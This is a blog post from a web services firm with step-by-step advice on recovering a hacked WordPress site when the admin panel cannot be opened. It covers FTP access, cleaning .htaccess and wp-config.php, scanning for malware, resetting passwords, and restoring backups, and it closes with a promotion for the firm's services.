How to Manage a Hacked WordPress Website When Admin Panel Is Also Not Openable

WordPress powers over 40% of websites globally, making it a popular target for hackers. Getting hacked can be a nightmare, especially when you can’t even access your WordPress admin dashboard. Whether it’s a defaced homepage, a redirect to malicious websites, or total lockdown from your admin panel, the situation calls for immediate action.

In this blog, we’ll guide you through the steps to manage a hacked WordPress website when the wp-admin panel is also inaccessible.

Don’t Panic: Evaluate the Situation

First things first: breathe. Many website owners have faced this problem, and while it's serious, it's fixable. Begin by identifying the signs of a hack:

• You are redirected to a strange website.
• The homepage is replaced or defaced.
• You get a white screen of death.
• You’re locked out of the admin panel.
• There’s a warning from Google that your site is compromised.
• New, suspicious users appear in your database.

Make note of any such symptoms. Document error messages and take screenshots if necessary. This information will be useful later if you hire a professional.

Contact Your Hosting Provider Immediately

Your hosting provider can be your first line of defense. Good hosts usually maintain access logs, backups, and security tools that can be helpful.

Ask them to:

• Temporarily disable the website to prevent further damage.
• Scan for malware.
• Restore the most recent clean backup if possible.
• Give you access to logs that show unauthorized activities.

If you’re on shared hosting, your host might already be aware of the breach and could be working on a solution. Managed WordPress hosting providers often have specialized support for this kind of situation.

Access Files Through FTP or File Manager

Since you can’t access the WordPress admin panel, you’ll need to go through the backend using FTP (File Transfer Protocol) or your hosting account’s File Manager.

Steps:

• Use an FTP client like FileZilla.
• Enter your FTP credentials (get them from your hosting account).
• Connect and browse to the /public_html/ or root directory of your WordPress site.

Once inside, check for:

• Recently modified files (especially in /wp-content/themes/, /wp-content/plugins/, and root).
• Suspicious files with strange names or extensions like .ico, .php5, .bak, etc.

Do not delete files randomly. Instead, download copies for inspection or to show your web developer.

Check and Clean the .htaccess File

The .htaccess file controls many server-level functions. Hackers often use it to redirect your website to malicious domains.

Steps:

• Locate the .htaccess file in the root directory.
• Download a backup before editing.
• Open the file and look for suspicious redirects or code.
• Replace its content with the default WordPress .htaccess

Manually Disable Plugins

Hackers often exploit vulnerabilities in plugins. Since the admin panel is inaccessible, you can disable plugins manually via FTP.

Steps:

• Navigate to /wp-content/
• Rename the plugins folder to something like plugins-disabled

This will deactivate all plugins at once. Try accessing your site afterward. If it loads, one of the plugins was likely the cause.

You can then rename the folder back to plugins, and disable plugins one by one by renaming individual plugin folders to identify the culprit.

Scan Files for Malware

You can use malware scanner tools that work via file uploads or server-side scripts. Some popular options:

• Sucuri SiteCheck (browser-based)
• Wordfence CLI (requires server access)
• MalCare Manual Scanner

Also, look for suspicious code patterns such as:

• Base64 encoded text
• Long strings of random characters
• eval() functions in PHP files

If you find suspicious code, isolate it and get professional advice before removing it.

Check the wp-config.php File

The wp-config.php file contains your WordPress database credentials. Hackers sometimes modify this file to inject malicious commands.

Look for:

• Additional code after the ?> PHP closing tag
• Unknown constants or functions
• Suspicious includes or remote file calls

Remove any unfamiliar or malicious-looking code carefully.

Reset File Permissions

Incorrect file permissions can allow unauthorized access. Resetting them can help prevent further issues.

Recommended settings:

• Files: 644
• Directories: 755
• wp-config.php: 600

Use your FTP client or hosting control panel to adjust these permissions.

Change All Passwords and Security Keys

Once you have some control back, change all related passwords:

• Hosting account
• FTP
• WordPress database
• Email accounts linked to the site

Also, update the WordPress Security Keys in wp-config.php using the WordPress key generator. This will force all users to re-login and invalidate any session hijacking.

Restore from a Clean Backup

If your host or you have a clean backup from before the hack:

• Download the backup to check it's uncompromised.
• Restore the files and database.
• Change all passwords after the restore.
• Update all plugins, themes, and WordPress core to the latest version.

Make sure the backup itself isn't compromised before restoring.

Reinstall WordPress Core Files

To ensure the core files haven’t been tampered with:

Steps:

• Download the latest WordPress from WordPress.org.
• Extract the ZIP file.
• Upload only the /wp-admin/ and /wp-includes/ folders via FTP, replacing the existing ones.
• Do not replace wp-content/ or wp-config.php.

This overwrites any hacked core files.

Scan and Clean the Database

Some hacks inject malicious scripts into the database, especially in wp_options, wp_posts, or wp_users tables.

Use tools like:

• phpMyAdmin for manual inspection
• Wordfence Premium or MalCare for automated scanning

Look for JavaScript in post content or suspicious admin accounts.

Notify A Professional Web Developer

If your website is hacked and your admin panel is inaccessible, you should absolutely involve a professional web developer. They can:

• Detect and remove deeply embedded malware
• Review server logs for the root cause
• Secure the site from future attacks
• Prevent unintentional data loss
• Help get your site off Google's blacklist

Trying to fix a hacked website without expertise can sometimes do more harm than good. A certified developer can save you time, money, and future risk.

Conclusion

Dealing with a hacked WordPress site is stressful, especially when you can’t even open your admin panel. From accessing your files via FTP to checking for suspicious code and restoring from backups, every step must be taken with caution. However, the safest and most efficient solution is to contact a professional web developer as soon as possible. Attempting to clean a hacked website without technical expertise may lead to more damage.

If you're facing such a situation and need expert help, Shriji Solutions is here to assist. Our experienced team specializes in WordPress recovery, malware removal, and security hardening. Don’t wait until it’s too late get your website back in safe hands with Shriji Solutions.